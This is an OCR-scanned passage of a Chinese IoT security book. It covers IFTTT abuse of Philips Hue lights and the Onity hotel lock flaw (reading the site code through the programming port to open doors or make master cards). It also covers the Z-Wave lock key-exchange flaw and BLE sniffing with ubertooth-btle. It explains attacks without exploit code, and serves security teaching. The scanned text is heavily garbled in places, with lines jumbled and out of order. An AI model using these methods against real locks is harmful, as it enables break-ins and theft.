IFTTT 用 户 也 可 以 创建 用 于 照明 系统 的 流程 ( 见 图 1-17) ， 例 如 ，“ 当 我 标记 了 Facebook 上 的 照片 ， 请 关 灯 让 我 知道 。” 


IFTTT / Philips hue Channel 


"Philips h hue Channel 


Channels 


Philips hue connected bulbs and bridge let you to take 
full contro! of your lighting. Whatever you want to do 
with your lighting, hue can. 


PHILIPS 


Popular Philips hue Recipes 


NP | E m 
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Eh MISI | TAL LF 


PHILIPS PHILIPS PHILIPS 


If it begins to rain then change the If l add a photo to Instagram then If l'm tagged in a photo then blink 
light colors to blue change my lights to match its colors i 
13 by hue on May 10, 2013 
usad 251 times 


图 1-17: 应 用 了 IFTTT 的 照明 系统 信道 


IFTTT 服 务 允 许 用 户 团体 通过 多 种 渠道 提供 解决 方案 ， 包 括 照明 系统 的 。 有 了 这 么 多 便捷 的 解决 方案 ， 用 户 就 不 必 总 是 担心 这 些 渠道 被 其 他 人 滥用 而 对 他 们 的 物 联网 设备 
造成 影响 了 。 


举 一 个 不 安全 的 流程 的 例子 ， 考 虑 如 图 1-18 所 示 的 情况 ， 它 允许 用 户 改变 灯泡 的 颜色 以 匹配 标记 的 照片 。 


eo S MES IFTTT / When I'm tagged in a photo on Facebook, change my hue to reflect its colors by kev 


n When I PC in a photo on 
Facebook, change my hue to reflect its 
Colors 


Browse Recipes 


PHILIPS 


You are tagged in a photo Change color from image 


by kev 
May 13, 2013 [v 
used 24 times 


Use Recipe 


图 1-18: 改变 灯泡 颜色 以 匹配 标记 照片 的 IFTTT 流 程 


如 图 1-19 所 示 ， 当 攻击 者 向 Facebook 上 传 了 一 张 全 黑 的 图 片 并 标记 给 受害 者 时 ， 这 种 流程 就 会 导致 受害 者 的 家 中 或 办 公 室 停电 。 


另外 一 个 需要 考虑 的 问题 是 保存 于 IFTTT 平 台 上 的 授权 会 话 。 用 户 可 以 注册 并 关联 功能 强大 的 平台 ， 如 Facebook、Dropbox、Gmail 等 。IFTTT 基 础 架构 漏洞 ， 其 他 关联 
平台 基础 架构 漏洞 ， 用 户 IFTTT 账 户 ， 或 者 其 他 平台 账号 都 有 可 能 被 攻击 者 利用 ， 通 过 使 用 中 的 流程 来 影响 照明 系统 的 灯泡 状态 。 


eoo 


|a 
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这 个 潜在 的 安全 问题 是 一 个 很 好 的 例子 ， 对 于 即将 蜂拥 而 至 的 物 联网 设备 与 云 平台 互 操 作 浪 潮 来 讲 ， 这 也 是 我 们 需要 考虑 的 一 个 问题 。 黑 客 利用 跨 平台 


实时 攻击 ， 仪 仪 是 时 间 问 题 。 


1.6 


小 结 


当前 ， 我 们 
备 在 体系 结构 以 及 设计 上 必须 是 安全 的 。 


当前 ， 飞 利 
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图 1-19: 标记 一 个 全 黑 的 Facebook 有 照片 
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Need Textbooks Fast? 
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漏洞 对 物 联网 设施 


依赖 于 照明 设备 给 我 们 带 来 的 便利 ， 依 赖 于 照明 设备 给 我 们 带 来 安全 ， 依 赖 于 照明 设备 确保 我 们 的 社会 和 经 济 正常 运转 。 由 于 这 个 原因 ， 控 制 照明 的 物 联网 设 


浦 照明 系统 是 市 场 上 非常 流行 的 一 款 物 联网 设备 。 本 章 介绍 了 该 系统 的 几 个 安全 问题 ， 包 括 一 些 基本 问题 ， 例 如 密码 安全 ， 以 及 恶意 软件 利用 弱 认 证 机 制导 致 


寺 续 停 电 的 可 能 性 等 。 我 们 还 讨论 了 将 在 线 空间 (如 Facebook) 与 使 用 IFTTT 等 服务 的 物 联网 设备 互联 起 来 的 复杂 性 。 虽 然 这 些 服务 非常 有 用 ， 将 来 也 会 使 我 们 的 生活 更 加 现 


代 化 ， 但 是 我 们 


照明 设备 制 
因而 需要 照明 设备 制造 商 提供 产品 设计 安全 的 证 明 。 


关注 由 此 带 来 的 安全 复杂 度 及 隐私 问题 。 


造 商 应 当 努 力 改进 他 们 的 设计 ， 确 保安 全 性 ， 免 草本 章 所 讨论 的 风险 问题 的 侵扰 。 消 费 者 应 当 意 识 到 他 们 自己 家 中 、 办 公 室 里 的 设备 上 可 能 存在 的 安全 隐患 ， 


第 2 章 ”电子 援 锁 一 一 滥用 门 锁 危害 物理 安全 


从 埃及 人 开始 ， 我 们 受 希 腊 、 罗 马 和 各 种 来 自 中 


目前 已 知 最 古老 的 锁 可 以 追溯 到 4000 年 前 ， 它 发 现 于 古 埃及 帝国 
一 个 槽 可 以 插入 带 有 与 锁 销 长 度 匹 配 的 木 销 的 木 钥匙 。 钥 是 插入 到 锁 中 并 抬 起 ， 使 木 销 均匀 地 在 门 门 顶部 对 齐 ， 


的 废墟 中 。 这 种 锁 因 当时 在 该 地 


国 、 土 耳 其 、 印 度 等 东方 


国家 的 锁 的 影响 ， 以 及 后 来 英 


包括 了 可 移动 的 杠杆 、 圆 柱 形 的 钥匙 和 销 栓 的 组 合 ， 


没有 正确 的 钥匙 就 很 难 打开 它 。 


国 和 美国 


区 流行 而 被 称 为 埃及 锁 。 锁 是 用 木头 做 的 ， 内 有 不 同 长 度 的 木 销 。 门 上 的 
这 样 便 可 以 打开 门 。 


的 影响 ， 造 就 了 今天 我 们 所 依赖 的 各 种 不 同类 型 的 锁 ， 它 


虽然 我 们 很 多 人 都 知道 用 不 同 的 技术 开锁 是 多 么 容易 ， 但 目前 家 中 还 是 依赖 锁 来 保障 我 们 的 安全 。 许 多 国家 和 地 区 试图 通过 颁布 禁止 拥有 开锁 工具 的 法 令 来 阻止 其 大 肆 流 
行 。 但 是 ， 诚 如 你 所 想 ， 仅 仅 存 在 规定 ， 并 不 能 阻止 那些 想 要 进入 房屋 的 恶意 实体 (犯罪 分 子 ) 。 


展望 物 联网 设备 的 未 来 ， 对 我 们 来 说 ， 摆 脱 对 传统 物理 锁具 挑选 的 关注 ， 分 析 使 我 们 处 于 高 风险 状态 的 电子 门 锁 机 制 就 变 得 重要 了 。 本章 将 探讨 现 有 的 电子 门 锁 安全 问 
题 ， 其 无 线 机 制 ， 以 及 它们 与 移动 设备 的 集成 。 我 们 将 在 接 下 来 的 几 节 中 逐步 完成 这 些 话题 ， 探 讨 电 子 门 锁 当前 的 安全 机 制 (或 不 足 ) 。 制 造 广 商 建立 起 不 良 安全 决策 之 后 ， 
我 们 会 更 了 解 潜在 的 风险 ， 并 对 这 些 类 型 的 锁 在 未 来 将 需要 什么 样 的 安全 措施 有 更 好 的 想法 。 


2.1 酒店 门 锁 和 磁卡 


研究 员 Cody Brocious 发 现 了 一 个 常见 的 门 锁 漏洞 ， 它 影响 着 世界 各 地 数 以 百 万 计 的 酒店 门 锁 。 鉴 于 其 潜在 的 影响 ， 在 此 便 不 可 不 提 。 事 实 上 ，Brocious 在 2012 年 7 月 的 
黑 帽 安全 大 会 上 曝光 这 一 问题 之 后 ， 很 多 酒店 出 现 了 入 侵 者 利用 这 个 漏洞 进入 酒店 房间 并 窃取 财物 的 真实 案例 。Brocious 的 作品 滥用 了 基本 安全 设计 缺陷 ， 在 信息 安全 社区 流 
行 起 来 ， 这 里 是 开始 了 解 电 子 门 锁 相关 安全 性 问题 的 理想 场所 。 


2.1.1 Onity[ 794 


Onity HT 门 锁 非 常 受 欢迎 。 如 果 你 曾 入 住 过 酒店 ， 很 有 可 能 已 经 用 到 过 ， 并 依靠 它 保护 你 的 安全 和 隐私 。 Onity 锁 有 一 个 磁性 钥匙 卡 读 卡 器 ， 如 图 2-1 所 示 。 酒 店 的 客人 
都 有 磁性 钥匙 卡 ， 通 过 划 过 读 卡 器 来 打开 门 锁 。 酒 店员 工 可 以 在 客人 办 理 入 住 手续 或 客人 要 额外 的 门 卡 时 发 给 客人 。 酒 店 给 员工 发 通用 钥匙 卡 ， 例 如 打扫 房间 的 工作 人 员 可 以 
打开 多 个 门 。 


研究 具有 传统 机 制 的 采用 磁卡 作为 钥匙 的 Onity 锁 很 重要 ， 因 为 下 一 代 基于 物 联网 的 门 锁 可 能 保留 传统 机 制 (普通 钥匙 和 磁 条 卡 ) 并 混合 更 智能 的 方法 ， 如 无 线 认 证 和 电 
子 钥匙 ， 这 将 在 本 章 接 下 来 的 部 分 讨论 。 理 解 Onity 锁 的 安全 问题 非常 重要 ， 因 为 这 为 理解 基本 的 安全 设计 缺陷 打下 基础 ， 使 得 能 够 利用 这 些 信息 影响 全 世界 使 用 的 锁 。 我 们 
必须 努力 防止 发 生 这 种 情况 。 


图 2-1: Onity 门 锁 


2.1.2 H 


我 们 生活 中 经 常 遇 到 磁 条 卡 ， 从 信用 卡 、 公 共 交 通 卡 到 酒店 房 卡 ， 我 们 依赖 磁 条 卡 获取 服务 和 进入 特定 场所 。 图 2-2 展 示 了 一 张 典 型 的 带 有 磁性 条 带 ( 即 磁 条 ) 的 信用 卡 


的 背面 。 标 签 @ 指 磁性 条 ，@ 是 签名 条 ，@ 表 示 卡 的 安全 码 (CSC) 。 下 文中 讨论 的 酒店 房 卡 ， 通 常 只 有 背面 的 磁 条 与 正面 的 酒店 标志 。 


FH RS, 


图 2-2: 带 磁 条 的 卡片 


通常 ， 磁 条 包含 3 个 存储 不 同 数据 块 的 独立 磁道 。 磁 道 1 和 2 一 般 用 于 金融 行业 的 ATM、 借 记 卡 和 信用 卡 ， 并 没有 限定 哪个 机 构 使 用 特定 的 磁道 。Onity 门 锁 使 用 磁道 3， 它 
包含 以 下 数据 序列 : 


16 位 识别 码 


一 个 识别 码 包 含 了 卡 能 开 的 房 门 和 卡 的 复制 版 本 信息 。 为 酒店 员工 创建 主 卡 时 ， 通 过 存储 的 一 个 值 代表 酒店 员工 的 身份 而 不 是 门 的 标识 。 当 客人 入 住 酒店 时 ， 为 指定 房间 
的 门 制作 的 第 一 张 卡 的 复制 标识 位 设置 为 0， 接 下 来 的 复制 卡 标识 位 依次 加 1， 以 便 识 别 。 


8 位 标志 字 节 


用 一 个 字 节 设置 各 种 其 他 选项 的 值 。 


16 位 过 期 日 期 


客人 办 理 入 住 手续 时 ， 设 置 门 卡 的 有 效 时 长 。 


24 位 未 知 位 


设置 为 全 0。 


24 位 钥匙 编码 


该 值 被 写 入 单个 门 锁 。 这 时 ， 门 锁 中 配置 一 个 提前 量 。 例 如 ， 一 把 门 锁 的 钥匙 编码 是 100， 提 前 量 是 50， 那 有 效 的 钥匙 编码 值 是 100 ~ 150 的 一 个 整数 。 每 当 插入 有 效 卡 
时 ， 门 锁 把 自身 的 钥匙 编码 重 置 成 门 卡 的 值 。 通 过 这 种 方式 ， 门 锁 钥 匙 编码 增加 以 确保 较 旧 的 门 卡 失 效 。 注 意 ， 代 表 主 钥匙 的 具体 钥匙 编码 也 存储 在 门 锁 中 。 酒 店 用 不 同 的 主 
钥匙 编码 来 分 割 不 同 的 区 域 ， 使 得 仅 有 某 些 锁 能 够 用 酒店 指定 的 主 钥匙 卡 打开 。 


站 点 代码 (site code) 值 是 由 Onity 随 机 分 配 的 唯一 的 32 位 随机 值 ， 采 用 站 点 代码 来 加 密 24 位 钥匙 编码 ， 以 便 确 认 酒 店 财产 。 如 果 这 个 值 被 破解 ， 便 能 造 出 任意 磁卡 开 
锁 ， 也 能 给 门 锁 重新 设置 (如 后 文 所 述 ) 。 


站 点 代码 实际 使 用 的 加 密 算法 在 Cody Brocious 的 白皮书 附录 B 中 。 


除了 这 里 所 述 的 典型 钥匙 卡 之 外 ， 该 系统 还 包括 编程 卡 和 备用 卡 。 当 刷 过 编程 卡 后 再 刷 备用 卡 ， 那 么 备用 卡 就 成 了 这 道门 的 客人 门 卡 了 。 这 些 卡 是 当 编码 器 (用 来 制作 客 
ATE) 出 现 故障 时 使 用 的 。 编 程 卡 也 是 用 站 点 代码 值 加 密 的 ， 然 而 备用 卡 是 没有 加 密 过 的 。 当 (用 编程 卡 ) 制作 一 批 备 用 卡 时 ， 每 张 卡 的 识别 码 都 依次 递增 。 


客人 将 卡 插入 门 锁 ， 利 用 站 点 代码 解密 卡 上 的 数据 。 下 一 步 ， 检 查 是 否 在 有 效 期 内 。 最 后 ， 检 查 钥匙 编码 ， 如 果 在 提前 量 范 围 内 就 能 打开 门 锁 。 


2.1.3 ”编程 端口 


锁 的 右 下 角 有 一 个 编程 端口 ， 该 端口 也 用 作 直 流 电源 适配器 接口 。 在 安装 门 锁 和 更 换 门 锁 电 池 时 ， 会 导致 存储 被 重 置 ， 这 时 可 用 一 个 便携 的 编程 器 (PP) 给 门 锁 编程 。 安 
装 时 ，PP 用 来 配置 锁 的 识别 码 和 钥匙 编码 。 


PP 也 能 用 来 连接 门 锁 并 发 出 指令 ， 如 提供 正确 的 站 点 代码 来 开锁 。 


xI 


PP 还 可 以 通过 编程 端口 读 取 锁 的 存储 区 。 


214 安全 问题 


Brocious 的 白皮书 描述 了 有 关 Onity 锁 的 各 种 安全 问题 。 了 解 这 些 问题 是 非常 重要 的 ， 因 为 它们 会 影响 数 以 百 万 计 的 配备 这 些 锁 的 酒店 房 门 。 他 们 还 表示 ， 其 他 锁 制 造 商 
应 尽量 避免 缺乏 基本 的 安全 控制 。 


微 控制 器 漏洞 


如 果 站 点 代码 是 已 知 的 ， 就 能 通过 连接 到 编程 端口 使 用 简单 的 微 控制 器 打开 锁 ， 如 便宜 ($50 以 下 ) 流行 的 Arduino。 


Cody Brocious 在 他 的 白皮书 的 附录 A 中 介绍 了 Arduino 开 锁 所 需 代 码 (也 称 为 sketch) 。 基 本 上 ，Brocious 的 sketch 利 用 了 这 个 事实 : 使 用 Arduino 可 以 从 编程 端口 读 
取 存 储 器 的 任何 部 分 。Brocious 用 这 个 办 法 读 取 存储 器 的 站 点 代码 ， 然 后 用 它 调用 开锁 命令 开锁 。 


对 数 以 百 万 计 安装 在 世界 各 地 不 同 地 方 的 Onity 锁 来 说 ， 这 是 一 个 严重 的 安全 问题 。 只 要 有 在 附近 电子 商店 购买 的 Arduino 微 控制 器 ， 任 何人 都 可 以 走 到 使 用 Onity 锁 保护 
的 门 前 ， 打 开 它 。 事 实 上 ， 著 名 的 连锁 酒店 ， 如 假日 酒店 、 长 住 酒店 、 优 质 酒店 、 拉 昆 塔 酒店 、 红 屋顶 酒店 、 汽 车 酒店 六 、 经 济 酒店 、 万 怡 万 豪 酒店 和 舒适 客栈 报道 的 盗窃 案 
都 是 由 这 一 特殊 的 安全 问题 造成 的 。 


锁 存储 中 的 主 钥匙 编码 


通过 读 取 锁 存储 中 的 主 钥匙 编码 可 以 制作 主 钥匙 卡 。 站 点 代码 也 可 以 从 存储 中 读 出 ， 这 个 值 可 用 来 制作 主 卡 。 如 前 所 述 ， 酒 店 可 以 选择 不 同 区 域内 的 锁 使 用 不 同 的 主 卡 。 
因此 ， 主 钥匙 可 以 限定 在 酒店 的 特定 区 域 房间 使 用 。 


然而 ， 这 仍然 是 一 个 严重 的 问题 ， 因 为 潜在 的 入 侵 者 可 以 用 一 次 性 创建 的 主 钥匙 卡 进入 酒店 一 整 片区 域 的 房间 。 


未 加 密 的 备用 卡 


如 前 所 述 ， 每 一 个 附 随 的 备用 卡 都 是 通过 增 量 识别 值 创建 的 ， 是 没有 加 密 的 。 当 编码 器 故障 时 可 以 使 用 这 些 卡 。 因 此 ， 如 果 入 侵 者 可 以 拿 着 识别 值 为 500 的 备用 卡 ， 那 他 
可 以 制作 识别 值 为 499 或 501 的 备用 卡 去 尝试 打开 其 他 门 。 


当然 ， 用 新 制作 的 备用 卡 具体 能 打开 哪 房 门 不 太 容 易 确定 ， 这 种 攻击 实施 起 来 有 些 困 难 。 


2.1.5 厂商 的 应 对 


2012 年 7 月 24 日 ，Brocious 向 全 世界 发 表 了 他 的 研究 和 文章 ， 为 装备 有 廉价 Arduino 芯 片 的 人 提供 所 有 需要 的 信息 ， 进 入 数 以 百 万 计 的 酒店 房间 。 同 时 ， 警 示 公 众 需要 承 
担 入 住 配 有 Onity 门 锁 的 酒店 的 风险 。 公 众 和 酒店 拥有 者 监督 着 Onity 公 司 ， 他 们 期 待 Onity 公 司 提供 相应 的 解决 方案 。 


2012 年 7/ 月 25 日 和 8 月 13 日 ，Onity 公 司 分 别 发 表 回应 ， 指 出 将 通过 固件 升级 来 缓解 这 一 问题 。 同 时 承诺 在 编程 端口 插入 一 个 机 械 盖子 防止 访问 端口 ， 并 采用 额外 的 Torx 螺 
钉 进 行 固定 。 


Onity 的 声明 有 几 个 问题 。 首 先 ， 对 一 般 的 犯罪 分 子 来 说 ， 打 开机 械 盖子 并 最 终 连接 编程 端口 仅 仪 是 增加 了 些许 难度 一 一 仅 需 几 件 额外 的 工具 (在 电子 或 杂货 商店 花 几 美 
元 就 能 买 到 的 梅花 螺丝 刀 ) 。 此 外 ， 正 如 Brocious 的 反驳 所 指出 的 那样 ，Onity 的 门 锁 设 计 无 法 做 到 不 更 新 电路 板 而 进行 真正 的 固件 更 新 。 因 此 ， 实 际 上 ， 酒 店 业主 不 得 不 更 
换 电路 板 ( 数 百 万 门 锁 的 费用 ) ， 而 不 只 是 进行 简单 地 更 新 固件 。 


做 出 响应 几 个 星期 后 ，Onity 删 除了 网 站 上 所 有 相关 的 痕迹 。 进 一 步调 查 显示 ，Onity 公 司 已 经 根据 门 锁 的 生产 日 期 为 一 些 连 锁 酒店 更 换 电路 板 。 


针对 特定 制造 商 特殊 的 安全 问题 ， 揭 示 出 当 涉 及 大 规模 产品 设计 时 ， 我 们 必须 认识 到 维修 费用 问题 以 及 最 终 会 给 制造 商 (Onity) 和 客户 (保障 客人 安全 的 连锁 旅店 ) Ti 
来 品牌 声誉 的 负面 影响 的 问题 。 首 先 ， 批 量 生产 的 设备 应 尽 可 能 包含 发 布 在 需要 时 相关 补丁 的 能 力 ， 这 是 至 关 重 要 的 。 因 为 相对 硬件 修复 来 说 ， 软 件 补丁 成 本 更 低 ， 更 具 可 扩 
展 性 。 其 次 ， 鉴 于 独立 研究 人 员 在 安全 分 析 方面 的 兴趣 ， 供 应 商 需要 更 加 透明 ， 并 与 研究 机 构 一 起 促进 道德 规范 和 维持 最 终 消费 者 对 其 信任 。 


在 本 节 中 ， 我 们 关注 了 为 数 以 百 万 计 的 人 们 提供 安全 保障 的 一 种 很 流行 的 门 锁 ， 虽 然 这 种 门 锁 是 传统 的 〈 基 于 磁 条 的 ) ， 但 仍 是 面向 未 来 发 展 的 重要 一 课 ， 因 为 下 一 代 门 
锁 将 包括 磁 条 卡 以 及 具有 更 多 机 制 的 电子 钥匙 。 我 们 在 本 节 中 学 到 的 内 容 为 继续 探讨 分 析 接 下 来 章节 中 所 涵盖 的 无 线 和 电子 钥匙 功能 的 门 锁 提 供 了 坚实 的 基础 。 


2.2 ”采用 Z-Wave 技 术 的 门 锁 案 例 


Z-Wave 是 专 为 家 庭 自动 化 设计 的 一 组 无 线 协议 。 它 用 小 数据 块 进行 传输 ， 所 以 能 耗 很 小 ， 可 以 很 容易 地 由 入 到 设备 中 ， 如 灯泡 、 娱 乐 系统 ， 及 各 种 家 用 电器 。 


Z-Wave 协 议 最 初 由 一 家 叫 作 Zen-Sys 的 公司 开发 ， 该 公司 在 2008 年 被 西格玛 设计 公司 收购 。Z-Wave 标 准 由 Z-Wave 联 盟 的 制造 商 协会 制定 。 


开始 介绍 Z-Wave 之 前 ， 首 先 要 向 西格玛 设计 公司 购买 开发 工具 包 并 下 载 Z-Wave 的 SDK。 要 获得 Z-Wave 的 认证 ， 就 要 加 入 Z-Wave 联 盟 成 为 其 一 员 。 


在 本 节 中 ， 我 们 将 讨论 在 由 西格玛 公司 设计 的 Z-Wave 应 用 中 发 现 影响 门 锁 安 全 的 具体 安全 漏洞 。 这 为 
构建 的 无 线 门 锁 的 安全 设计 。 


hm 


要 的 安全 问题 提供 了 良好 的 研究 视角 ， 同 时 影响 了 利用 Z-Wave 


2.2.1. Z-Wave 协 议和 实现 分 析 


Z-Wave 协 议 包 括 以 下 几 层 : 


物理 层 


该 层 包 合 无 线 电 通 信 的 物理 层 规范 。 
传输 层 


该 层 负 责 数 据 包 的 传输 以 及 当 数 据 包 未 被 传输 到 目的 时 进行 重 传 。 设 备 电能 供应 是 有 限 的 ， 比 如 电池 供电 的 门 锁 常 被 设计 成 进入 睡眠 模式 。 这 样 的 设备 定期 打开 无 线 功 能 
查找 输入 数据 。 当 事件 发 生 时 ， 传 输 层 负责 协调 唤醒 设备 。 在 这 种 状况 下 ， 发 射 装置 每 隔 100 毫 秒 发 送 一 些 背靠背 数据 包 ， 以 确保 休眠 设备 探测 到 数据 包 。 


网 络 层 


Z-Wave 采 用 基于 网 格 的 网 络 使 任何 节点 都 能 够 直接 或 通过 中 继 节点 与 附近 节点 交互 。 在 一 定 范围 内 的 节点 能 够 直接 通信 ， 或 者 与 已 经 接 入 目的 节点 的 其 他 节点 进行 信息 
交换 。 每 个 Z-Wave 网 络 能 够 容纳 多 达 232 个 设备 和 1 个 主 控制 器 设备 。 这 种 灵活 、 低 功 耗 的 方式 ， 使 Z-Wave 在 家 庭 自动 化 设备 中 非常 具有 吸引 力 。 


应 用 层 


该 层 负责 解析 数据 包 并 对 Z-Wave 的 命令 和 参数 进行 解码 。Z-Wave 的 SDK 用 于 解析 传 入 的 有 效 数 据 ， 包 括 特 定 的 命令 类 。Z-Wave 命 令 类 定义 了 设备 特定 的 功能 ， 如 报警 
传感器 、 门 锁 、 温 度 控制 器 等 。 每 个 命令 类 相应 包含 多 个 命令 ， 例 如 获取 或 设 定 温度 控 制 器 的 温度 。 


2013 年 7 月 ， 安 全 研究 人 员 Behrang Fouladi 和 Sahand Ghanoun 发 布 了 白皮书 ， 评 估 了 围绕 Z-Wave 协 议 对 门 锁 影 响 的 安全 风险 问题 。 作 者 还 发 布 了 一 个 免费 的 工具 ， 
称 为 Z-Force， 它 可 以 让 你 分 析 捕 获 的 Z-Wave 的 通信 和 包 和 发 送 特制 的 数据 包 。 所 需 的 唯一 额外 硬件 是 75 美 元 的 CCIl1O 射 频 收 发 器 。 


为 了 分 析 Z-Wave 协 议 ，Fouladi 和 Ghanoun 研 究 了 使 用 Z-Wave 协 议 的 门 锁 。 研 究 主要 集中 在 Z-Wave 的 应 用 层 ， 他 们 发 现 锁 第 一 次 与 控制 器 配对 (如 Mi Casa Verde 控 
制 器 ) ， 控 制 器 和 锁 交 换 加 密 密 铀 。 密 钥 由 Z-Wave 芯 片上 基于 硬件 的 伪 随机 数 发 生 器 (PRNG) 生成 ， 并 由 芯片 固件 中 (发现 是 4 个 字 节 的 零 ) 硬 编 码 的 临时 默认 密 钥 加 密 。 


密 钥 成 功 生成 后 ，Fouladi 和 Ghanoun 发 现 可 以 用 交换 的 密 钥 作为 输入 又 生成 两 个 新 的 密 铀 。 首 先 ， 创 建 帧 加 密 密 钥 来 加 密 通 信 序 列 里 的 有 效 载荷 数据 。 接 着 ， 创 建 数据 
源 认 证 密 钥 ， 以 确保 外 部 实体 不 能 重 放 网 络 数据 包 一 一 密 钥 使 用 消息 验证 码 (MAC) 算法 ， 该 算法 使 得 恶意 实体 很 难 捕获 和 重 放 通信 数据 。Fouladi 和 Ghanoun 的 文章 提供 
了 详细 的 密码 算法 分 析 。 


2.2.2 ”利用 密 钥 交换 漏洞 


Fouladi 和 Ghanoun 发 现 Z-Wave 的 实现 中 涉及 锁 和 控制 器 间 初 始 化 原始 密 钥 交换 协议 的 严重 漏洞 。 他 们 发 现 即使 锁 和 控制 器 配对 后 ， 仍 能 传输 一 个 密 钥 交换 数据 包 导 致 
门 锁 能 够 接受 一 个 全 新 的 共享 密 钥 。 


这 个 缺陷 是 : 一 旦 门 锁 与 控制 器 配对 ， 应 该 在 电 可 擦 除 可 编程 只 读 存 储 器 (EEPROM) 中 检查 当前 密 钥 并 载 入 现 有 密 钥 RFE) 。 这 一 基本 验证 步骤 的 缺乏 使 得 
Fouladi 和 Ghanoun 可 以 随意 打开 西格玛 公司 设计 的 Z-Wave 门 锁 。 


这 种 攻击 的 另 一 个 副作用 是 : 由 于 锁 的 共享 密 钥 被 攻击 者 替换 了 ， 发 给 控制 器 的 事件 (如 “ 门 开 了 ”) 将 被 控制 器 拒绝 一 一 因为 锁 和 控制 器 间 的 共享 密 钥 不 再 匹配 了 ， 认 
证 检查 将 被 拒绝 。 相 反 ， 产 生 了 这 样 一 种 情况 ， 任 何 内 置 于 控制 器 去 警告 主人 门 正 打开 的 逻辑 都 将 被 绕 开 。 


Fouladi 和 Ghanoun 的 研究 与 发 现 很 好 地 表明 了 : 如 此 简单 的 有 效 性 检测 会 给 我 们 的 房子 和 办 公 场 所 的 物理 安全 造成 严重 影响 ， 而 这 些 地 方正 依赖 门 锁 帮 助 我 们 保护 自己 
和 所 爱 的 人 。 这 个 例子 说 明 : 在 涉及 安全 问题 时 ， 不 仅 要 求 门 锁 厂 商 而 且 需 要 那些 实现 固件 和 无 线 协议 的 厂商 确保 设计 是 健全 合理 的 。 此 例 中 ，Z-Wave 协 议 的 实现 者 的 一 个 
下 忽 导致 了 各 种 锁 的 不 安全 设计 。 


据 Fouladi 和 Ghanoun 所 说 ， 西 格 玛 设计 公司 做 出 了 响应 并 和 他 们 合作 找 出 最 佳 验证 方案 并 修复 漏洞 。 尽 管 西格玛 设计 公司 方面 给 出 了 积极 的 姿态 ， 但 应 用 固件 升级 问题 
依然 存在 。 设 施 和 房屋 管理 者 通常 没有 检查 固件 更 新 的 程序 ， 就 直接 将 其 应 用 到 门 锁 和 控制 器 上 。 在 许多 情况 下 ， 功 能 未 能 实现 更 新 或 是 大 规模 应 用 的 费用 过 于 昂贵 。 


总 结 一 下 要 点 ， 我 们 关注 物 联网 的 物理 安全 ， 一 个 简单 的 设计 失误 会 致使 数 百 万 家 庭 的 安全 变 得 脆弱 ， 考 虑 到 补救 的 复杂 性 和 成 本 问题 ， 这 种 情况 还 会 持续 下 去 。 


2.3 ”低能 耗 蓝牙 和 通过 移动 应 用 程序 开锁 


到 目前 为 止 ， 我 们 已 经 对 磁卡 门 锁 的 攻击 情况 进行 了 研究 ， 为 了 解 针 对 常见 门 锁 的 基本 攻击 手段 商定 了 坚实 的 基础 。 我 们 也 研究 了 Z-Wave 门 锁 ， 并 发 现 一 个 在 实现 协议 
时 犯 的 简单 错误 是 如 何 导致 门 锁 不 再 安全 的 。 


这 一 节 ， 我 们 将 看 一 下 使 用 低 功 耗 蓝牙 (BLE) 的 Kwikset Kevo 门 锁 ， 如 图 2-3 所 示 。 从 物 联网 的 角度 来 看 ， 使 用 iPhone 应 用 程序 控制 这 种 门 锁 看 起 来 非常 有 趣 。 
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图 2-3: Kwikset Kevo 门 锁 


这 里 ， 我 们 将 讨论 已 知 的 BLE 的 弱点 以 及 如 何 捕获 无 线 流量 ， 但 我 们 会 特别 关注 iOS 应 用 程序 ， 这 把 它 从 我 们 目前 已 经 讨论 的 门 锁 中 区 分 出 来 。 


2.3.1 ”使 用 抓 包 工具 了 解 BLE 的 弱点 
作为 建立 于 2010 年 的 蓝牙 4.0 标 准 的 一 部 分 ，BLE 在 业界 受到 了 惊人 的 支持 ， 因 为 它 功 耗 很 低 ， 这 对 智能 手机 、 平 板 电脑 和 物 联网 设备 来 说 都 非常 重要 。 蓝 牙 硬 件 芯 片 仅 
需 2 美 元 ， 与 ZigBee 和 Z-Wave 协 议 相 比 有 着 明显 的 竞争 优势 。 


蓝牙 技术 联盟 负责 维护 现 有 的 蓝牙 规范 。 需 要 注意 的 是 ， 该 规范 涵盖 了 经 典 的 蓝牙 和 BLE， 但 两 者 并 不 相互 兼容 (采用 4.0 以 前 规范 的 蓝牙 设备 不 能 与 BLE 设 备 相 互通 


BLE 工 作 在 2.4GHz 频 段 ， 被 分 成 40 个 信道 ， 其 中 37 个 用 来 传输 数据 ， 其 余 3 个 用 于 未 连接 的 设备 来 广播 设备 信息 并 建立 连接 。 设 备 可 以 在 监听 范围 内 向 任何 扫描 设备 或 接 
收 器 广播 数据 。 这 允许 设备 发 送 单 向 数据 到 其 他 设备 。 


广播 设备 发 送 一 个 广告 数据 包 ， 其 中 包含 31 字 节 的 有 效 载 荷 ， 包 括 关 于 广播 设备 以 及 任何 其 他 自 定 义 的 信息 。 当 31 个 字 节 不 够 传递 必要 的 信息 时 ，BLE 支 持 一 种 称 为 扫描 
响应 的 机 制 ， 其 中 侦 听 设 备 可 以 用 它 来 请 求 第 二 条 广告 帧 ， 长 度 也 是 31 字 节 ， 总 数 达 到 了 62 个 字 节 。 


广告 包 不 包含 任何 安全 机 制 ， 因 此 敏感 信息 一 定 不 能 在 广播 包 中 发 送 。 


为 了 在 两 个 方向 上 都 能 传输 数据 ， 设 备 需 要 在 主 设备 和 从 设备 之 间 建 立 连接 。 主 设备 接收 到 由 从 设备 发 送 的 广告 数据 包 ， 并 要 求 该 从 设备 建立 一 个 永久 连接 。 一 个 设备 可 
以 同时 为 主 设备 和 从 设备 。 一 个 从 设备 可 以 连接 到 多 个 主 设备 ， 一 个 主 设备 也 可 以 连接 到 多 个 从 设备 。 


BLE 包 可 以 通过 使 用 基于 USB 的 Ubertooth One 设 备 以 及 Ubertooth 软 件 工具 套装 捕获 ，Ubertooth 软 件 工具 套装 可 以 通过 构建 向 导 生 成 。 这 些 工 具 中 包含 一 个 频谱 分 析 
仪 (如 图 2-4 所 示 ) ， 在 购买 Ubertooth One 后 ， 你 应 该 立即 运行 它 ， 以 确保 一 切 工作 正常 。 


Ubertooth Spectrum Analyzer 


图 2-4: Ubertooth 频 谱 分 析 


Ubertooth 项 目 还 包括 一 个 叫 作 ubertooth-btle 的 工具 ， 能 够 通过 以 下 命令 捕获 BLE 数 据 流 : 


[bash]$ ubertooth-btle -f -c capture.cap 


-f 标 志 表 示 新 建立 的 BLE 连 接 ，-c 标 志 指 定 捕获 的 数据 所 写 入 的 文件 名 。 这 个 文件 可 以 使 用 Wireshark 网 络 嗅 探 器 打开 ， 如 图 2-5 所 示 。 


